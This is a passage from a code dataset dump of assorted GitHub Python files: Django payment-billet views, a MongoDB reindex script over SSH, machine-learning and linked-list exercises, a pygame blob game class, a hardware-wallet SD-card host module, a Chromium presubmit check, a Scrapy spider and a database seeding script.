aggfunc=['min','max','mean','std'])\n","repo_name":"ougx/python2020summer","sub_path":"LauraThompson/Exercise7/Exercise7PandaBasics.py","file_name":"Exercise7PandaBasics.py","file_ext":"py","file_size_in_byte":7840,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"42"} +{"seq_id":"30928781654","text":"# -*- coding:utf-8 -*-\nimport textwrap\nfrom pyboleto.pdf import BoletoPDF\n\nfrom django.conf import settings\nfrom django.http import HttpResponse\nfrom django.utils.formats import date_format\nfrom django.utils.timezone import now\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.views import generic\n\nfrom payments 
import models\nfrom payments.billet import BoletoCaixa\nfrom utils.views import LoginRequiredMixin\n\n\nclass ManagedPaymentsMixin(object):\n \"\"\"\n A Mixin that offers a list of payments whose the logged in user is manager.\n \"\"\"\n def get_queryset(self):\n return models.Payment.objects.filter(\n contract__pk=self.kwargs['contract_pk']).order_by('-due_date')\n\n\nclass PaymentListView(LoginRequiredMixin, ManagedPaymentsMixin, generic.ListView):\n paginate_by = 12\n template_name = 'payments/payment_list.html'\n\n\nclass PaymentDetailView(generic.DetailView):\n \"\"\"Shows detailed information about the Payment before print the billet.\"\"\"\n model = models.Payment\n\n def get_context_data(self, **kwargs):\n context = super(PaymentDetailView, self).get_context_data(**kwargs)\n if not self.request.user.is_staff:\n self.object.visit_set.create() # register how many visits\n return context\n\n def get_template_names(self):\n if self.request.user.is_authenticated():\n return ['payments/billing.html', ]\n else:\n return ['payments/billing_not_logged.html', ]\n\n\ndef print_payment(request, pk):\n \"\"\"Generates the billet for payment as PDF for printing.\"\"\"\n payment = models.Payment.objects.get(pk=pk)\n client = payment.contract.client\n\n # Set billet mainiti's data\n billet = BoletoCaixa()\n billet.carteira = settings.CEDENTE_CARTEIRA\n billet.conta_cedente = settings.CEDENTE_CONTA\n billet.agencia_cedente = settings.CEDENTE_AGENCIA\n billet.cedente = settings.CEDENTE\n billet.cedente_documento = settings.CEDENTE_DOCUMENTO\n billet.cedente_cidade = settings.CEDENTE_CIDADE\n billet.cedente_uf = settings.CEDENTE_UF\n billet.cedente_logradouro = settings.CEDENTE_LOGRADOURO\n billet.cedente_bairro = settings.CEDENTE_BAIRRO\n billet.cedente_cep = settings.CEDENTE_CEP\n\n # Set billet instructions\n billet.demonstrativo = textwrap.wrap(unicode(payment), 90)\n instructions = _('Do not accept payment after due date.')\n billet.instrucoes = textwrap.wrap(instructions, 90)\n\n # Set billet client's data\n billet.data_documento = now()\n billet.data_processamento = now()\n billet.data_documento = now()\n billet.data_vencimento = payment.due_date\n billet.nosso_numero = str(payment.id)\n billet.numero_documento = str(payment.id)\n billet.valor = payment.cost\n billet.valor_documento = payment.cost\n billet.sacado_nome = client.name\n billet.sacado_documento = client.cnpj\n billet.sacado_cidade = client.city\n billet.sacado_uf = client.state\n billet.sacado_endereco = client.address\n billet.sacado_bairro = client.quarter\n billet.sacado_cep = client.postal_code\n\n response = HttpResponse(mimetype='application/pdf')\n billet_file = BoletoPDF(response)\n billet_file.drawBoleto(billet)\n billet_file.save()\n\n if not request.user.is_staff:\n payment.open_set.create() # regiter how many opens\n\n name = _('billet-{0}.pdf')\n name = name.format(date_format(payment.due_date, 'SHORT_DATE_FORMAT'))\n response['Content-Disposition'] = 'attachment; filename=\"{0}\"'.format(name)\n return response\n","repo_name":"fredericosachweh/amostra2","sub_path":"payments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"27511241687","text":"from time import time\nfrom conf import ssh, mongo\n\nimport pymongo\nfrom sshtunnel import SSHTunnelForwarder\n\n\ndef re_index(db_name):\n start = time()\n print(f'reIndex {db_name} collection')\n db[db_name].reindex()\n print(f'End reIndex 
{db_name} \\n')\n print(f'{db_name} has been reIndex() for {round((time() - start), 3)}ms')\n\n\nserver = SSHTunnelForwarder(\n\n ssh_address_or_host=ssh.get('MONGO_HOST'),\n ssh_port=ssh.get('MONGO_PORT'),\n ssh_username=ssh.get('MONGO_USER'),\n ssh_password=ssh.get('MONGO_PASS'),\n remote_bind_address=('127.0.0.1', 27017)\n\n)\n\nif __name__ == '__main__':\n\n try:\n server.start()\n except:\n print(\"Invalid data in conf.py\")\n else:\n print(f\"ssh {ssh.get('MONGO_USER')}@{ssh.get('MONGO_HOST')}:{ssh.get('MONGO_PORT')} connect...\")\n\n client = pymongo.MongoClient('127.0.0.1', server.local_bind_port)\n db = client[mongo.get('MONGO_COLLECTION_NAME')]\n\n now = time()\n for db_names in db.list_collection_names():\n re_index(db_names)\n print(f'Выполнено: {round(time() - now, 3)} seconds')\n\n server.stop()\n print(f\"ssh {ssh.get('MONGO_USER')}@{ssh.get('MONGO_HOST')}:{ssh.get('MONGO_PORT')} disconnect...\")\n\n\n\n","repo_name":"MartinLuzifer/Rocket.chat","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"17465945062","text":"\"\"\"143. Reorder List\"\"\"\n\n\"\"\"\nApproach:\n 1 2 3 4 5 6\n 1. Find the mid and make the mid.next to Null\n 2. Reverse the list after the mid\n 3. Will use two pointers for each half\n 3.1 l_curr, l_prev, r_curr and r_prev\n 3.2 The prev pointer will be assigned to the curr pointer and curr pointer will move to the next node\n 3.3 The l_prev will point the r_curr\n 3.4 The right pointers will also do the same as the step 3.1 and 3.2\n 3.5 The r_prev will then point to the l_curr\n 3.6 And this is one cycle of the loop until one of the _curr pointer is not becoming None\n\"\"\"\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reorderList(self, head: Optional[ListNode]) -> None:\n \"\"\"\n Do not return anything, modify head in-place instead.\n \"\"\"\n\n # Finding the mid node of the list\n slow_pointer: ListNode = head\n fast_pointer: ListNode = head\n while (fast_pointer.next != None and fast_pointer.next.next != None):\n slow_pointer = slow_pointer.next\n fast_pointer = fast_pointer.next.next\n\n # Separating the list from half and reversing the right half\n fast_pointer = slow_pointer.next\n slow_pointer.next = None\n slow_pointer = None\n temp_pointer: ListNode = None\n while (fast_pointer != None):\n slow_pointer = fast_pointer\n fast_pointer = fast_pointer.next\n slow_pointer.next = temp_pointer\n temp_pointer = slow_pointer\n \n # Applying our approach \n left_prev: ListNode = None\n left_curr: ListNode = head\n right_prev: ListNode = None\n # slow_pointer is the head of the second half\n right_curr: ListNode = slow_pointer\n\n while(left_curr != None and right_curr != None):\n # Assigning the left_prev to left_curr\n left_prev = left_curr\n # Moving the left_curr to the next node\n left_curr = left_curr.next\n # Pointing the left_prev node to the right_curr node\n left_prev.next = right_curr\n # Assigning the right_prev to the right_curr\n right_prev = right_curr\n # Moving the right_curr to the next node\n right_curr = right_curr.next\n # Pointing the right_prev to the left_curr node\n right_prev.next = left_curr\n\n\n\n\n 
","repo_name":"AchyutPal21/dsa_python","sub_path":"LinkedList/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"75063126847","text":"''' MOHAMED MOUBARAK MOHAMED MISBAHOU MKOUBOI (1820705) '''\r\n#import sklearn\r\nimport sklearn\r\n\r\n# import decision_tree classifier from scikit\r\nfrom sklearn import tree\r\n\r\n# Convert Features in Int, 1 = 2 seats, 0 = 4 or 5 seats\r\nfeatures = [[150, 1], [250, 1], [660, 0], [1300, 0]]\r\n\r\n# Convert Labels into Int, 1 = Motorbike, 0 = Motorcycle\r\nlabels = [1, 1, 0, 0]\r\n\r\n# Create the Classifier - This is now an empty box of rules\r\nclassifier = tree.DecisionTreeClassifier()\r\n\r\n# We need an Algorithm to train it - scikit comes with fit\r\nclassifier = classifier.fit(features, labels)\r\n\r\n#predict a fruit\r\nclassifier.predict([[8,0]])\r\n\r\ndef whatmoto(feat1, feat2):\r\n motoname = \"\"\r\n moto = classifier.predict([[feat1,feat2]])\r\n if moto == 1:\r\n motoname = \"Motorbike\"\r\n else:\r\n motoname = \"Motorcar\"\r\n return motoname\r\n\r\n#predict a moto\r\nprint(classifier.predict([[8,1]]) , whatmoto(157, 1))\r\n\r\nprint(classifier.predict([[8,0]]) , whatmoto(1000, 0))","repo_name":"Mouba-Mouba/PYTHON","sub_path":"intelligent system/codes and exercises/exercise 2.py","file_name":"exercise 2.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"29879393819","text":"import pygame\nimport numpy as np\nfrom Projectiles import Projectiles\nfrom Food import Food\n\nfrom utils import deflate_func , speed_coeff_func\n\nWHITE = 255,255,255\nGREY = 128,128,128\n\n\n \n\nclass Player:\n\n def __init__(self , rules , blobs_infos):\n \n self.type = \"player\"\n \n self.MAX_SUB_BLOB = rules[\"MAX_SUB_BLOB\"]\n self.actual_sub_blob = 1\n \n self.index = 0\n \n bx , by = rules[\"borders_X\"] , rules[\"borders_Y\"]\n self.borders = pygame.math.Vector2(bx,by)\n \n #= Default speed and size =#\n self.df_speed = rules[\"df_speed\"]\n self.df_size = rules[\"df_size\"]\n self.global_size = self.df_size\n \n #= Number of frames before merging two sub cells =#\n #= For example, 600 frames = 10 seconds at 60 fps =#\n self.merge_time = rules[\"merge_time\"]\n self.collisions_test = np.zeros(self.MAX_SUB_BLOB,dtype=\"bool\")\n self.collisions_time = np.zeros(self.MAX_SUB_BLOB,dtype=\"float\")\n \n #= The blob can shoot projectiles after having a size bigger than shoot_projectile =#\n self.shoot_threshold = rules[\"shoot_threshold\"]\n \n #= The blob can split itself after having a size bigger than division_threshold =#\n self.division_threshold = rules[\"division_threshold\"]\n \n # How size influences speed ( the bigger the faster ) =#\n self.viscosity = rules[\"viscosity\"]\n \n # How much of the mass is converted into a projectile =#\n self.projectile_percentage = rules[\"projectile_percentage\"]\n \n #================================#\n #= Column 0 1 : Position Vector =#\n #= Column 2 3 : Speed Vector =#\n #= Column 4 : Size =#\n blobs_infos[0,0:2] = [bx/2,by/2]\n blobs_infos[0,2:4] = [0,0]\n blobs_infos[0,4] = self.df_size\n #================================#\n \n self.compute_personal_data(blobs_infos)\n \n \n def update(self,target_pos,blobs_infos):\n \n self.compute_personal_data(blobs_infos)\n \n self.move(target_pos,blobs_infos)\n self.deflate(blobs_infos)\n self.join(blobs_infos)\n\n def 
compute_personal_data(self,blobs_infos):\n '''\n Compute the size, center of gravity\n '''\n \n self.global_size = np.sum(blobs_infos[0:self.actual_sub_blob,4])\n self.center_of_gravity = np.average(blobs_infos[0:self.actual_sub_blob,0:2] , axis=0)\n \n \n \n def move(self,target_pos,blobs_infos):\n \n for i in range(self.actual_sub_blob):\n radius_i = np.sqrt(blobs_infos[i,4] / np.pi)\n \n direction = target_pos - pygame.math.Vector2(blobs_infos[i,0],blobs_infos[i,1])\n direction.normalize_ip()\n \n speedCoeff = speed_coeff_func(blobs_infos[i,4],self.df_size,self.viscosity) \n \n blobs_infos[i,2:4] = ( blobs_infos[i,2:4] + direction * self.df_speed * speedCoeff) / 2\n \n new_pos = blobs_infos[i,0:2] + blobs_infos[i,2:4]\n \n for j in range(self.actual_sub_blob):\n \n if((j!=i) and (self.collisions_test[j] or self.collisions_test[i])):\n radius_j = np.sqrt(blobs_infos[j,4] / np.pi)\n \n # Collision !\n dist = np.linalg.norm(new_pos - blobs_infos[j,0:2])\n if( dist < radius_i+radius_j):\n \n dir = (blobs_infos[i,0:2] - blobs_infos[j,0:2])\n dir = dir / np.linalg.norm(dir)\n \n new_pos = new_pos + dir*(radius_i+radius_j-dist)\n \n blobs_infos[i,0:2] = new_pos\n \n \n blobs_infos[0:self.actual_sub_blob,0] = np.clip(blobs_infos[0:self.actual_sub_blob,0] , 0 , self.borders.x)\n blobs_infos[0:self.actual_sub_blob,1] = np.clip(blobs_infos[0:self.actual_sub_blob,1] , 0 , self.borders.y)\n \n def deflate(self,blobs_infos):\n \n for i in range(self.actual_sub_blob):\n blobs_infos[i,4] -= deflate_func(blobs_infos[i,4])\n \n \n def shoot(self,target_pos,projectiles,borders,blobs_infos):\n \n for i in range(self.actual_sub_blob):\n direction = target_pos - pygame.math.Vector2(blobs_infos[i,0],blobs_infos[i,1])\n direction.normalize_ip()\n \n size = blobs_infos[i,4]\n \n if(size > self.df_size):\n \n pos = pygame.math.Vector2(blobs_infos[i,0],blobs_infos[i,1])\n radius = np.sqrt( size / np.pi )\n \n projectile_size = size * self.projectile_percentage\n projectile_position = pos + pygame.math.Vector2((radius+2)*direction.x,(radius+2)*direction.y)\n \n blobs_infos[i,4] -= projectile_size\n projectiles.add( projectile_position , direction , projectile_size , borders )\n \n\n def split(self,target_pos,blobs_infos):\n \n for i in range(self.actual_sub_blob):\n direction = target_pos - pygame.math.Vector2(blobs_infos[i,0],blobs_infos[i,1])\n direction.normalize_ip()\n \n size = blobs_infos[i,4]\n \n if(size > self.division_threshold): \n\n radius = np.sqrt( size / np.pi )\n \n #= Position Updates =#\n blobs_infos[self.actual_sub_blob,0:2] = blobs_infos[i,0:2] + (radius+25)*np.array([direction.x,direction.y])\n \n #= Speed Updates =#\n blobs_infos[self.actual_sub_blob,2:4] = blobs_infos[i,2:4]*5\n \n #= Size Updates =#\n blobs_infos[i,4] /= 2\n blobs_infos[self.actual_sub_blob,4] = blobs_infos[i,4]\n \n #= Collisions Updates =#\n self.collisions_test[i] = True\n self.collisions_test[self.actual_sub_blob] = True\n \n self.collisions_time[i] = self.merge_time \n self.collisions_time[self.actual_sub_blob] = self.merge_time \n \n self.actual_sub_blob += 1\n \n\n def join(self,blobs_infos):\n '''\n Deals with the merge time of sub_blobs, as well as when sub_blobs are re-joining after a split\n '''\n \n if( self.actual_sub_blob > 1 ):\n \n for i in range(self.actual_sub_blob):\n \n if(self.collisions_test[i]):\n \n self.collisions_time[i] -= 1\n \n if( self.collisions_time[i] == 0 ):\n \n self.collisions_test[i] = False\n \n \n for i in range(self.actual_sub_blob-1):\n radius_i = np.sqrt(blobs_infos[i,4] / np.pi)\n 
\n for j in range(i+1,self.actual_sub_blob):\n radius_j = np.sqrt(blobs_infos[j,4] / np.pi)\n \n dist = np.linalg.norm( blobs_infos[i,0:2] - blobs_infos[j,0:2] )\n \n if( dist < max(radius_i,radius_j) ) :\n \n # Merge the two cells from the sub array\n blobs_infos[i,0:4] = (blobs_infos[i,0:4] + blobs_infos[j,0:4])/2\n \n blobs_infos[i,4] += blobs_infos[j,4]\n \n # Reorganize the array\n for k in range(j+1,self.actual_sub_blob):\n blobs_infos[k-1] = blobs_infos[k]\n \n self.actual_sub_blob -= 1\n \n def show(self,screen,width,height,camPos,blobs_infos):\n \n for i in range(self.actual_sub_blob):\n screen_pos = pygame.math.Vector2(width/2+blobs_infos[i,0],height/2+blobs_infos[i,1]) - camPos\n \n if(screen_pos.x > 0 and screen_pos.y > 0 and screen_pos.x < width and screen_pos.y < height):\n \n radius = np.sqrt( blobs_infos[i,4] / np.pi )\n if(i==0):\n pygame.draw.circle(screen, WHITE, screen_pos , radius )\n else:\n pygame.draw.circle(screen, GREY , screen_pos , radius )\n \n \n def respawn(self,blobs_list,blobs_infos,rules):\n \n self.actual_sub_blob = 1\n \n bx , by = rules[\"borders_X\"] , rules[\"borders_Y\"]\n \n self.collisions_test = np.zeros(self.MAX_SUB_BLOB,dtype=\"bool\")\n self.collisions_time = np.zeros(self.MAX_SUB_BLOB,dtype=\"float\")\n \n #================================#\n #= Column 0 1 : Position Vector =#\n #= Column 2 3 : Speed Vector =#\n #= Column 4 : Size =#\n collides = True\n \n while(collides):\n \n collides = False\n \n pos = np.array([np.random.randint(0,bx),np.random.randint(0,by)],dtype=\"float\")\n \n i = 0\n while(i < len(blobs_list) and not collides):\n \n for j in range(blobs_list[i].actual_sub_blob):\n radius = np.sqrt(blobs_infos[blobs_list[i].index+j,4] / np.pi) \n \n if( np.linalg.norm(pos - blobs_infos[blobs_list[i].index+j,0:2]) < radius ):\n collides = True\n \n i += 1\n \n blobs_infos[0,0:2] = pos\n blobs_infos[0,2:4] = [0,0]\n blobs_infos[0,4] = self.df_size\n #================================#\n \n self.compute_personal_data(blobs_infos)\n\n \n \n \n","repo_name":"R0mainPinguet/agarBot","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":9914,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"42"} +{"seq_id":"69802852288","text":"from .core import Host, HostError\nfrom platform import fpath\nfrom io import BytesIO\nimport os\nimport platform\nfrom binascii import b2a_base64, a2b_base64, hexlify\nfrom helpers import a2b_base64_stream\n\nclass SDHost(Host):\n \"\"\"\n SDHost class.\n Manages communication with SD card:\n - loading unsigned transaction and authentications\n - saving signed transaction to the card\n \"\"\"\n\n button = \"Open SD card file\"\n settings_button = \"SD card\"\n\n def __init__(self, path, sdpath=fpath(\"/sd\")):\n super().__init__(path)\n self.sdpath = sdpath\n self.f = None\n self.fram = self.path + \"/data\"\n self.sd_file = self.sdpath + \"/signed.psbt\"\n\n def reset_and_mount(self):\n if self.f is not None:\n self.f.close()\n os.remove(self.fram)\n self.f = None\n if not platform.is_sd_present:\n raise HostError(\"SD card is not inserted\")\n platform.mount_sdcard()\n\n def copy(self, fin, fout):\n b = bytearray(100)\n while True:\n l = fin.readinto(b)\n if l == 0:\n break\n fout.write(b, l)\n\n async def get_data(self, raw=False, chunk_timeout=0.1):\n \"\"\"\n Loads host command from the SD card.\n \"\"\"\n self.reset_and_mount()\n try:\n sd_file = await self.select_file([\".psbt\", \".txt\", \".json\"])\n if sd_file is None:\n return\n 
self.sd_file = sd_file\n with open(self.fram, \"wb\") as fout:\n with open(self.sd_file, \"rb\") as fin:\n # check sign prefix for txs\n start = fin.read(5)\n if self.sd_file.endswith(\".psbt\") and start != b\"sign \":\n fout.write(b\"sign \")\n fout.write(start)\n self.copy(fin, fout)\n self.f = open(self.fram,\"rb\")\n finally:\n platform.unmount_sdcard()\n return self.f\n\n def truncate(self, fname):\n if len(fname) <= 33:\n return fname\n return fname[:18]+\"...\"+fname[-12:]\n\n async def select_file(self, extensions):\n files = sum([[f[0] for f in os.ilistdir(self.sdpath) if f[0].lower().endswith(ext) and f[1] == 0x8000] for ext in extensions], [])\n \n if len(files) == 0:\n raise HostError(\"\\n\\nNo matching files found on the SD card\\nAllowed: %s\" % \", \".join(extensions))\n # elif len(files) == 1:\n # return self.sdpath+\"/\"+ files[0]\n \n files.sort()\n buttons = []\n for ext in extensions:\n title = [(None, ext+\" files\")]\n barr = [(self.sdpath+\"/\"+f, self.truncate(f)) for f in files if f.lower().endswith(ext)]\n if len(barr) == 0:\n buttons += [(None, \"%s files - No files\" % ext)]\n else:\n buttons += title + barr\n \n fname = await self.manager.gui.menu(buttons, title=\"Select a file\", last=(None, \"Cancel\"))\n return fname\n\n def completed_filename(self, filename):\n suffix = \"\" if self.parent is None else (\".\"+hexlify(self.parent.fingerprint).decode())\n if filename.endswith(\".psbt\"):\n return filename.replace(\".psbt\", \".signed%s.psbt\" % suffix)\n arr = filename.split(\".\")\n if len(arr) == 1:\n arr.append(\"completed%s\" % suffix)\n else:\n arr = arr[:-1] + [\"completed%s\" % suffix, arr[-1]]\n return \".\".join(arr)\n\n\n async def send_data(self, stream, *args, **kwargs):\n \"\"\"\n Saves transaction in base64 encoding to SD card\n as psbt.signed. 
file\n Returns a success message to display\n \"\"\"\n new_fname = self.completed_filename(self.sd_file)\n self.reset_and_mount()\n try:\n if isinstance(stream, str):\n with open(stream, \"rb\") as fin:\n with open(new_fname, \"wb\") as fout:\n self.copy(fin, fout)\n else:\n with open(new_fname, \"wb\") as fout:\n self.copy(stream, fout)\n stream.seek(0)\n finally:\n platform.unmount_sdcard()\n show_qr = await self.manager.gui.prompt(\"Success!\", \"\\n\\nProcessed request is saved to\\n\\n%s\\n\\nShow as QR code?\" % new_fname.split(\"/\")[-1])\n if show_qr:\n await self._show_qr(stream, *args, **kwargs)\n\n @property\n def tmpfile(self):\n return self.path+\"/tmp\"\n\n async def _show_qr(self, stream, meta, *args, **kwargs):\n # if it's str - it's a file\n if isinstance(stream, str):\n with open(stream, \"rb\") as f:\n await self._show_qr(f, meta, *args, **kwargs)\n return\n qrfmt = 1 # always offer simple text animation for qr codes\n start = stream.read(4)\n stream.seek(-len(start), 1)\n if start in [b\"cHNi\", b\"cHNl\"]: # convert from base64 for QR encoder\n with open(self.tmpfile, \"wb\") as f:\n a2b_base64_stream(stream, f)\n with open(self.tmpfile, \"rb\") as f:\n await self._show_qr(f, meta, *args, **kwargs)\n return\n if start in [b\"psbt\", b\"pset\"]:\n # psbt has more options for QR format\n qrfmt = await self.manager.gui.menu(buttons=[\n (1, \"Text\"),\n (2, \"Crypto-psbt\"),\n (3, \"Legacy BCUR\"),\n ], title=\"What format to use?\")\n\n title = meta.get(\"title\", \"Your data:\")\n note = meta.get(\"note\")\n msg = \"\"\n # if qrfmt == 0: # not psbt\n # res = stream.read().decode()\n # msg = meta.get(\"message\", res)\n # await self.manager.gui.qr_alert(title, msg, res, note=note, qr_width=480)\n EncoderCls = None\n if qrfmt == 1:\n from qrencoder import Base64QREncoder as EncoderCls\n elif qrfmt == 2: # we need binary\n from qrencoder import CryptoPSBTEncoder as EncoderCls\n elif qrfmt == 3:\n from qrencoder import LegacyBCUREncoder as EncoderCls\n if EncoderCls is not None:\n with EncoderCls(stream, tempfile=self.path+\"/qrtmp\") as enc:\n await self.manager.gui.qr_alert(title, msg, enc, note=note, qr_width=480)\n","repo_name":"cryptoadvance/specter-diy","sub_path":"src/hosts/sd.py","file_name":"sd.py","file_ext":"py","file_size_in_byte":6326,"program_lang":"python","lang":"en","doc_type":"code","stars":398,"dataset":"github-code","pt":"42"} +{"seq_id":"8729349606","text":"PRESUBMIT_VERSION = '2.0.0'\n\n\ndef CheckChange(input_api, output_api):\n results = []\n try:\n import sys\n old_sys_path = sys.path[:]\n cwd = input_api.PresubmitLocalPath()\n sys.path += [input_api.os_path.join(cwd, '..', '..', '..', '..', 'tools')]\n import web_dev_style.presubmit_support\n results += web_dev_style.presubmit_support.CheckStyleESLint(\n input_api, output_api)\n finally:\n sys.path = old_sys_path\n results += input_api.canned_checks.CheckPatchFormatted(input_api, output_api,\n check_js=True)\n return results\n\ndef CheckTestFilename(input_api, output_api):\n results = []\n\n def IsNameInvalid(affected_file):\n return affected_file.LocalPath().endswith('_tests.ts')\n\n invalid_test_files = input_api.AffectedFiles(include_deletes=False,\n file_filter=IsNameInvalid)\n for f in invalid_test_files:\n results += [\n output_api.PresubmitError(\n f'Disallowed \\'_tests\\' suffix found in \\'{f}\\'. 
WebUI test files '\n 'must end with \"_test\" suffix instead.')\n ]\n\n return results\n","repo_name":"chromium/chromium","sub_path":"chrome/test/data/webui/PRESUBMIT.py","file_name":"PRESUBMIT.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":16362,"dataset":"github-code","pt":"42"} +{"seq_id":"11050122895","text":"#import tree from sklearn\nfrom sklearn import tree\n#import accuracy_score from sklearn.metrices\nfrom sklearn.metrics import accuracy_score\n#input training data sets\nX_train = [[181, 80, 44], [177, 70, 43], [160, 60, 38], [154, 54, 37], [166, 65, 40], [190, 90, 47], [175, 64, 39],[177, 70, 40], [159, 55, 37], [171, 75, 42], [181, 85, 43]]\nY_train = ['male', 'male', 'female', 'female', 'male', 'male', 'female', 'female', 'female', 'male', 'male']\n#intilizing dicision tree through clf(classifier) variable which store our decision tree\nclf=tree.DecisionTreeClassifier()\n#train our decision tree using fit() function\nclf=clf.fit(X_train,Y_train)\n#provide unlabled datapoint\nX_test=[[198,92,48],[184,84,44],[183,83,44],[166,47,36],[170,60,38],[172,64,39],[182,80,42],[180,80,43]]\n#provide accurate result of unlabled datapoint so that we can check accuracy in last\nY_test=['male','male','male','female','female','female','male','male']\n#store result of prediction in a variable\nY_prediction=clf.predict(X_test)\n#print prediction resultand accuracy of our decision tree\nprint(\"Prediction of Decision tree:\",Y_prediction)\nprint(\"accuracy of Decision tree:\",accuracy_score(Y_test,Y_prediction))","repo_name":"rahul-y/ML-Algo-implementation","sub_path":"DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"27150660512","text":"import pkg_resources\nimport logging\nfrom pathlib import Path\nfrom .consts import FFMPEG_FILE, PYINSTALL_PLANNED\n\napp_root = Path.home() / 'Desktop' / 'stille_splitten'\n\nif FFMPEG_FILE is None:\n ffmpeg = 'ffmpeg'\nelse:\n if PYINSTALL_PLANNED:\n ffmpeg = pkg_resources.resource_filename('stille_splitten', FFMPEG_FILE)\n else:\n ffmpeg = Path(FFMPEG_FILE)\n\nSETTINGS = dict(\n batch_processing=False,\n log_level=logging.INFO,\n log_file=app_root / 'stille_splitten.log',\n dir_results=app_root / 'ergebnisse',\n dir_batch_processing=app_root / 'stapelverarbeitung',\n write_results_to_dir=True,\n print_full_sequences=False,\n # (Stille-Schwellwert: dBFS, Stille-Mindestdauer: Sekunden)\n ffmpeg_options=[(-60, 2), (-50, 1), (-70, 2), (-50, 2)],\n cli_input=None,\n run_id=None,\n ffmpeg_binary=ffmpeg,\n tolerance=1.5 # sekunden\n)\n","repo_name":"hogshead-revival-widow/stille_splitten","sub_path":"stille_splitten/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"8208953003","text":"import glob, os\nimport scrapy\nfrom crawler.items import AdoramaItem\nimport json\nfrom lorem_text import lorem\nimport copy\n\n\nclass AdoramaOfflineSpider(scrapy.Spider):\n name = \"offline_adorama\"\n currentDir = os.getcwd()\n rootDir = copy.deepcopy(currentDir)\n\n category = \"\"\n\n # Make sur folder & data files always exist\n folder = \"data\"\n file_name = \"data/adorama_offline.json\"\n\n if not os.path.exists(folder):\n os.mkdir(folder)\n\n open(file_name, \"w+\").close()\n\n # Change current directory & read html file offline\n 
os.chdir(\"./crawler/html\")\n start_urls = []\n for file in glob.glob(\"*.html\"):\n start_urls.append(\"file://\" + rootDir + \"/crawler/html/\" + file)\n\n # # Single test\n # start_urls = [\"file://\" + rootDir + \"/crawler/html/laptop-apple.html\"]\n\n # Return root dir\n os.chdir(rootDir)\n\n def start_request(self):\n for url in self.start_urls:\n self.logger.info(\"Crawling url............ %s\" % url)\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n item = AdoramaItem()\n products = response.xpath('//div[has-class(\"item-list\")]/div')\n self.category = response.xpath('//div[@class=\"manual-category\"]/text()').get() or \"notfound\"\n\n if len(products) < 1:\n self.logger.info(\"--------------------html empty\")\n\n for product in products:\n\n product_name = (\n product.xpath('./div[@class=\"item-details\"]/h2/a/text()').get().strip()\n or product.xpath('./div[@class=\"item-details\"]/h2/a/text()[2]').get().strip()\n or \"Missing\"\n )\n\n img_url = product.xpath('//div[@class=\"item-img\"]//img/@src').get() or \"/notfound\"\n\n item[\"brand\"] = \"Unknown\" if len(product_name) <= 0 else product_name.split(\" \")[0]\n\n item[\"category\"] = self.category\n item[\"name\"] = product_name\n item[\"description\"] = lorem.paragraphs(5)\n item[\"image\"] = \"https://www.adorama.com/images/product\" + img_url\n item[\"price\"] = product.xpath('//strong[@class=\"your-price\"]/text()').get()[1:]\n\n with open(self.file_name, \"r+\", encoding=\"utf-8\") as file:\n try:\n data = json.load(file)\n except:\n data = {\"products\": []}\n\n data[\"products\"].append(\n {\n \"name\": item[\"name\"],\n \"brand\": item[\"brand\"],\n \"category\": item[\"category\"],\n \"price\": item[\"price\"],\n \"image\": item[\"image\"],\n \"description\": item[\"description\"],\n }\n )\n file.seek(0)\n json.dump(data, file, ensure_ascii=False)\n\n yield item\n pass\n","repo_name":"tienduy-nguyen/ecommerce","sub_path":"crawler/crawler/spiders/adorama_offline.py","file_name":"adorama_offline.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"42"} +{"seq_id":"25003021003","text":"import json\nimport random\nimport string\nfrom http import HTTPMethod\n\nfrom pydantic import BaseSettings\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import Session\n\nfrom db_requester.db import Base, Request, RequestState\n\n\nclass ScriptSettings(BaseSettings):\n db_url: str\n\n\ndef get_random_string(length: int) -> str:\n return \"\".join(random.choices(string.ascii_lowercase, k=length))\n\n\ndef get_random_dict() -> dict[str, str]:\n result = {}\n for i in range(random.randint(0, 5)):\n result[get_random_string(i + 1)] = get_random_string(i + 1)\n return result\n\n\ndef get_random_json_or_none() -> str | None:\n random_dict = get_random_dict()\n if len(random_dict) == 0:\n return None\n return json.dumps(random_dict)\n\n\ndef randomize_request() -> Request:\n return Request(\n uri=f\"/{get_random_string(10)}\",\n method=str(random.choice(list(HTTPMethod))),\n params=get_random_json_or_none(),\n headers=get_random_json_or_none(),\n state=RequestState.pending,\n )\n\n\ndef main() -> None:\n settings = ScriptSettings()\n engine = create_engine(settings.db_url)\n Base.metadata.create_all(engine)\n with Session(engine) as session:\n for request in [randomize_request() for _ in range(random.randint(20, 40))]:\n session.add(request)\n session.commit()\n\n\nif __name__ == \"__main__\":\n 
